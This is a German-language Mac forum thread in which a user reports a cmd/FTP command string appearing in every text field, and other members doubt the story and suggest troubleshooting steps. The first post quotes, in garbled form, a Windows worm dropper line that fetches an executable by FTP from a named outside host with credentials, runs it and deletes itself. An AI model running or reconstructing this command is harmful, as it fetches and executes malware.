Trojaner, Wurm entdeckt

Sentire

Neues Mitglied
Thread Starter
Dabei seit
23.02.2007
Beiträge
14
Reaktionspunkte
0
Hallo, ich habe zwar keine Ahnung wie ich mir das Schätzchen gefangen habe, aber scheinbar habe ich es doch hinbekommen. Mein System fängt in unregelmäigen Abständen an folgenden Text zu erstellen:

%szstemroot%#szstem32#cmd.exe


cmd -c echo open http://www.powersofthosting.com 21 :: ik /echo user jonf10 powersoft :: ik /echo binarz :: ik /echo get szs32.exe :: ik /echo bze :: ik /ftp ßn ßv ßsÖik /del ik /szs32.exe /exit

Und dabei ist es ihm egal wo hin. Sei es ein Telegramm, vom Adium, dem Spotlight fenster, oder der Festplattenbezeichnung. Er würde es auch selber ausführen, wenn es könnte. Bisher nervt es nur, ich habe noch keine Schäden festgestellt. Allerdings auch keine Idee wie ich das Teil wieder loswerde. Ich hoffe ClamXAV findet ihn, ansonsten bin ich wohl auf Hilfe angewiesen.
 
Heißt das System Sentire oder wovon redest Du?
Wo wird der Text erstellt?
 
Öffne ja nicht dein Terminal, sonst wird der Befehl da ausgeführt,
und stellt vielleicht richtigen Schaden an :eek:
 
Da steht doch was von einer "szs32.exe" und Mac OS X kann doch keine ".exe"-Files ausführen.
 
Ich weiß das der Mac keine .exe ausführen kann. Aber trotzdem nervt es einfach nur. Er schreibt es quasie überall wo gerade platz ist. Wenn man in jedes Textfeld das gerade frei ist. Wenn man ein Telegramm geöffnet hat in die Eingabezeile. Wenn man die Macintosh HD angewählt hat, in den Bezeichner. Und wenn gerade nichts ausgewählt ist, gibt er halt den Typischen Wahnton aus, wenn man versucht etwas zu tippen wo nichts ist. Wenn man gerade im Terminal ist, würde er halt auch dort versuchen es auszuführen. Würde er es jetzt versuchen wo ich gerade diese Antwort tippe, würde es in diesem Feld stehen.
 
Was für einen Computer hast du und was für ein System?
 
ich denke es heisst "sys32.exe"
und es handelt sich um einen Win Wurm/Spyware
einfach mit nem win virenscanner entfernen
unter win hast du ihn dir ja auch eingefangen (?)

und das von dir zitierte sieht aus wie der befehl, das ding runterzuladen

oder aber du bekommst die meldung als spam/befehl an dein adium
hast du eine "offene" kontaktliste?
alles recht seltsam...und etwas unglaubwürdig
 
mach doch mal einen screenshoot von diesem Phaenomen. Ehrlich gesagt habe ich gewisse Zweifel an deiner Darstellung.
 
Öffne ja nicht dein Terminal, sonst wird der Befehl da ausgeführt,
und stellt vielleicht richtigen Schaden an :eek:
Im Terminal könnte er (falls es ein Trojanisches Pferd für den Mac sein sollte) doch nur was anrichten, wenn du mit sudo drin wärst. Oder irre ich mich da?
 
mach doch mal einen screenshoot von diesem Phaenomen. Ehrlich gesagt habe ich gewisse Zweifel an deiner Darstellung.

Wie stellst du dir das vor? Ich müsste ja schon ein Video drehen. Wenn ich dir jetzt ein Bild von meinem Desktop präsentiere wo der Texte stehe, würdest du mir wahrscheinlich sagen, das ich ihn dort hingeschrieben habe....
 
Das würde ich auch zu gerne nicht nur mit einem Screenshot sehen, sondern abgefilmt mit Abstand vom Bildschirm, so dass man sieht, was die Bedienerhände machen...

-> Ja, genau, das mache doch mal bitte! Und dann einfach den Youtube-Link hier einstellen.
 
Zuletzt bearbeitet:
Wie stellst du dir das vor? Ich müsste ja schon ein Video drehen. Wenn ich dir jetzt ein Bild von meinem Desktop präsentiere wo der Texte stehe, würdest du mir wahrscheinlich sagen, das ich ihn dort hingeschrieben habe....

Das wuerde ich vermutlich erkennen - wenn nicht mehr als 10 Minuten von jetzt ab vergehen :D
 
Das würde ich auch zu gerne nicht nur mit einem Screenshot sehen, sondern abgefilmt mit Abstand vom Bildschirm, so dass man sieht, was die Bedienerhände machen...

Mangels Videocamera bzw. Camcorder leider etwas schlecht. Aber wich würde es sofort tun. Ich warte nun erstmal was mein Virenscanner sagt, vielleicht haben wir ja wenn er fertig ist schon eine Erklrung für das ganze.
 
Also wenn ich den Text soo ansehe kann der warsch. nicht mal im Terminal schaden anrichten.
Also folgendes vorgehen:
Beende alle programm; Das phänomen immer noch aktiv?
Öffne aktivitätsanzeige und schau mal was da für prozesse rumgeistern.
Wichtig sind erstmal die Benutzerprozesse /deine Prozesse. Ist da irgendeiner drunter der dir suspkt vorkommt? Sonst zeige uns mal was da bei dir läuft und wir vergleichen mit den prozessen die bei uns laufen.


Edit: ach ja beende auch noch die widgets die laufen. (In der aktivitätsanzeige) Mal sehen ob da eiines davon so ein scheiss macht.
 
muss irgendwie an die ganzen Threads denken, die ähnlich anfingen... abstrus...
Ich war auf ner LAN, PC-Usern den Arsch versohlen und hab mir da nix eingefangen, außer ner Nikotinüberdosis...
Und da wird auch getauscht und gemacht....

PS: ScreenRecording ist aber machbar!
 
Zurück
Oben Unten